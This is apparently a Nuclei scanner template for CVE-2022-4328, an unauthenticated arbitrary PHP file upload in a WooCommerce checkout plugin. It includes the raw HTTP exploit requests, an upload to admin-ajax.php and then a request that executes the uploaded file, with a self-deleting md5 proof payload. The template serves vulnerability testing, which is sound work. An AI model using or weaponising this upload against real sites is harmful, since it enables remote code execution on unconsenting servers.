2023-05-06 12:12:20 +00:00
id: CVE-2022-4328

info:
  name: WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.
  remediation: Fixed in version 18.0
  reference:
    - https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed
    - https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4328
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4328
    cwe-id: CWE-434
    epss-score: 0.22681
    epss-percentile: 0.96077
    cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: najeebmedia
    product: woocommerce_checkout_field_manager
    framework: wordpress
  tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia,fileupload

variables:
  string: "CVE-2022-4328"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------22728be7b3104597

        --------------------------22728be7b3104597
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
        Content-Type: application/octet-stream

        <?php echo md5("{{string}}");unlink(__FILE__);?>
        --------------------------22728be7b3104597--
      - |
        GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{md5(string)}}'
# digest: 4b0a00483046022100db4a0f639753de0386e0d6f256fdf6e31797f887c3f67051f67f03ff12021437022100e2072c64127d9242a4900aa37c32949d284a94fa2f241e66d10828e56cf2acbd:922c64590222798bb761d5b6d8e72950